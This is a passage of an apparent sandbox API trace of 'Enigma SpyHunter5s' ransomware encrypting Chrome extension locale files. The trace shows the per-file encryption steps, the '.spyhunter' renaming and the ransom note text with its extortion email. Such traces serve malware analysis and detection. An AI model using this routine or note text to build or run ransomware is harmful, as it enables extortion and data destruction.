dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0157.229] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\nl\\messages.json") returned 164 [0157.229] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0157.229] GetProcessHeap () returned 0x2c0000 [0157.229] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c39fe0 [0157.229] ReadFile (in: hFile=0xa0, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25cec04, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x25cec04*=0x2800, lpOverlapped=0x0) returned 1 [0157.240] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0157.240] WriteFile (in: hFile=0xa0, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x25cec04, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x25cec04*=0x2800, lpOverlapped=0x0) returned 1 [0157.240] GetProcessHeap () returned 0x2c0000 [0157.240] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c39fe0 | out: hHeap=0x2c0000) returned 1 [0157.240] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0157.240] WriteFile (in: hFile=0xa0, lpBuffer=0x25cec44*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25cec04, lpOverlapped=0x0 | out: lpBuffer=0x25cec44*, lpNumberOfBytesWritten=0x25cec04*=0x4, lpOverlapped=0x0) returned 1 [0157.240] WriteFile (in: hFile=0xa0, lpBuffer=0x31f278*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25cec04, lpOverlapped=0x0 | out: lpBuffer=0x31f278*, lpNumberOfBytesWritten=0x25cec04*=0x30, lpOverlapped=0x0) returned 1 [0157.240] CloseHandle (hObject=0xa0) returned 1 [0157.240] GetProcessHeap () returned 0x2c0000 [0157.240] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0157.240] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\nl\\messages.json.spyhunter") returned 174 [0157.240] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\nl\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\nl\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\nl\\messages.json.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\nl\\messages.json.spyhunter")) returned 1 [0157.241] GetProcessHeap () returned 0x2c0000 [0157.241] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0157.241] GetProcessHeap () returned 0x2c0000 [0157.242] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f278 | out: hHeap=0x2c0000) returned 1 [0157.242] GetProcessHeap () returned 0x2c0000 [0157.242] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fe4d40 | out: hHeap=0x2c0000) returned 1 [0157.242] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ms\\$HOWDECRYPT$.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ms\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0157.243] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0157.243] WriteFile (in: hFile=0xa0, lpBuffer=0x25ceb7b*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x25ceca4, lpOverlapped=0x0 | out: lpBuffer=0x25ceb7b*, lpNumberOfBytesWritten=0x25ceca4*=0x127, lpOverlapped=0x0) returned 1 [0157.243] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0157.243] WriteFile (in: hFile=0xa0, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x25ceca4, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x25ceca4*=0x2ac, lpOverlapped=0x0) returned 1 [0157.244] CloseHandle (hObject=0xa0) returned 1 [0157.244] GetProcessHeap () returned 0x2c0000 [0157.244] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fe4878 | out: hHeap=0x2c0000) returned 1 [0157.244] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cec40 | out: pbBuffer=0x25cec40) returned 1 [0157.244] GetProcessHeap () returned 0x2c0000 [0157.244] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f278 [0157.244] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f278*, pdwDataLen=0x25cec38*=0x20, dwBufLen=0x30 | out: pbData=0x31f278*, pdwDataLen=0x25cec38*=0x30) returned 1 [0157.244] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ms\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ms\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0157.245] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ms\\messages.json") returned 164 [0157.245] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0157.245] GetProcessHeap () returned 0x2c0000 [0157.245] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c39fe0 [0157.245] ReadFile (in: hFile=0xa0, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25cebfc, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x25cebfc*=0x2800, lpOverlapped=0x0) returned 1 [0157.277] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0157.277] WriteFile (in: hFile=0xa0, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x25cebfc, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x25cebfc*=0x2800, lpOverlapped=0x0) returned 1 [0157.277] GetProcessHeap () returned 0x2c0000 [0157.277] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c39fe0 | out: hHeap=0x2c0000) returned 1 [0157.277] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0157.277] WriteFile (in: hFile=0xa0, lpBuffer=0x25cec3c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25cebfc, lpOverlapped=0x0 | out: lpBuffer=0x25cec3c*, lpNumberOfBytesWritten=0x25cebfc*=0x4, lpOverlapped=0x0) returned 1 [0157.278] WriteFile (in: hFile=0xa0, lpBuffer=0x31f278*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25cebfc, lpOverlapped=0x0 | out: lpBuffer=0x31f278*, lpNumberOfBytesWritten=0x25cebfc*=0x30, lpOverlapped=0x0) returned 1 [0157.278] CloseHandle (hObject=0xa0) returned 1 [0157.278] GetProcessHeap () returned 0x2c0000 [0157.278] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0157.278] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ms\\messages.json.spyhunter") returned 174 [0157.278] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ms\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ms\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ms\\messages.json.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ms\\messages.json.spyhunter")) returned 1 [0157.280] GetProcessHeap () returned 0x2c0000 [0157.280] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0157.280] GetProcessHeap () returned 0x2c0000 [0157.280] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f278 | out: hHeap=0x2c0000) returned 1 [0157.280] GetProcessHeap () returned 0x2c0000 [0157.280] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fe46e0 | out: hHeap=0x2c0000) returned 1 [0157.280] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ko\\$HOWDECRYPT$.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ko\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0157.302] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0157.302] WriteFile (in: hFile=0xa0, lpBuffer=0x25ceb73*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x25cec9c, lpOverlapped=0x0 | out: lpBuffer=0x25ceb73*, lpNumberOfBytesWritten=0x25cec9c*=0x127, lpOverlapped=0x0) returned 1 [0157.303] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0157.303] WriteFile (in: hFile=0xa0, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x25cec9c, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x25cec9c*=0x2ac, lpOverlapped=0x0) returned 1 [0157.303] CloseHandle (hObject=0xa0) returned 1 [0157.303] GetProcessHeap () returned 0x2c0000 [0157.303] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3007430 | out: hHeap=0x2c0000) returned 1 [0157.303] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\iw\\$HOWDECRYPT$.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\iw\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0157.304] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0157.304] WriteFile (in: hFile=0xa0, lpBuffer=0x25ceb6f*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x25cec98, lpOverlapped=0x0 | out: lpBuffer=0x25ceb6f*, lpNumberOfBytesWritten=0x25cec98*=0x127, lpOverlapped=0x0) returned 1 [0157.305] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0157.305] WriteFile (in: hFile=0xa0, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x25cec98, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x25cec98*=0x2ac, lpOverlapped=0x0) returned 1 [0157.305] CloseHandle (hObject=0xa0) returned 1 [0157.306] GetProcessHeap () returned 0x2c0000 [0157.306] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3006aa0 | out: hHeap=0x2c0000) returned 1 [0157.306] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cec38 | out: pbBuffer=0x25cec38) returned 1 [0157.306] GetProcessHeap () returned 0x2c0000 [0157.306] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f278 [0157.306] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f278*, pdwDataLen=0x25cec30*=0x20, dwBufLen=0x30 | out: pbData=0x31f278*, pdwDataLen=0x25cec30*=0x30) returned 1 [0157.306] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\iw\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\iw\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0157.307] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\iw\\messages.json") returned 164 [0157.307] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0157.307] GetProcessHeap () returned 0x2c0000 [0157.307] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c39fe0 [0157.307] ReadFile (in: hFile=0xa0, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25cebf4, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x25cebf4*=0x2800, lpOverlapped=0x0) returned 1 [0157.309] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0157.309] WriteFile (in: hFile=0xa0, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x25cebf4, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x25cebf4*=0x2800, lpOverlapped=0x0) returned 1 [0157.309] GetProcessHeap () returned 0x2c0000 [0157.309] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c39fe0 | out: hHeap=0x2c0000) returned 1 [0157.309] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0157.309] WriteFile (in: hFile=0xa0, lpBuffer=0x25cec34*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25cebf4, lpOverlapped=0x0 | out: lpBuffer=0x25cec34*, lpNumberOfBytesWritten=0x25cebf4*=0x4, lpOverlapped=0x0) returned 1 [0157.309] WriteFile (in: hFile=0xa0, lpBuffer=0x31f278*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25cebf4, lpOverlapped=0x0 | out: lpBuffer=0x31f278*, lpNumberOfBytesWritten=0x25cebf4*=0x30, lpOverlapped=0x0) returned 1 [0157.309] CloseHandle (hObject=0xa0) returned 1 [0157.309] GetProcessHeap () returned 0x2c0000 [0157.309] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0157.309] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\iw\\messages.json.spyhunter") returned 174 [0157.310] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\iw\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\iw\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\iw\\messages.json.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\iw\\messages.json.spyhunter")) returned 1 [0157.318] GetProcessHeap () returned 0x2c0000 [0157.318] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0157.318] GetProcessHeap () returned 0x2c0000 [0157.319] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f278 | out: hHeap=0x2c0000) returned 1 [0157.319] GetProcessHeap () returned 0x2c0000 [0157.319] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3006908 | out: hHeap=0x2c0000) returned 1 [0157.319] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\id\\$HOWDECRYPT$.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\id\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0157.320] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0157.320] WriteFile (in: hFile=0xa0, lpBuffer=0x25ceb67*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x25cec90, lpOverlapped=0x0 | out: lpBuffer=0x25ceb67*, lpNumberOfBytesWritten=0x25cec90*=0x127, lpOverlapped=0x0) returned 1 [0157.321] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0157.321] WriteFile (in: hFile=0xa0, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x25cec90, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x25cec90*=0x2ac, lpOverlapped=0x0) returned 1 [0157.321] CloseHandle (hObject=0xa0) returned 1 [0157.321] GetProcessHeap () returned 0x2c0000 [0157.321] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3006440 | out: hHeap=0x2c0000) returned 1 [0157.322] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cec30 | out: pbBuffer=0x25cec30) returned 1 [0157.322] GetProcessHeap () returned 0x2c0000 [0157.322] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f278 [0157.322] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f278*, pdwDataLen=0x25cec28*=0x20, dwBufLen=0x30 | out: pbData=0x31f278*, pdwDataLen=0x25cec28*=0x30) returned 1 [0157.322] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS 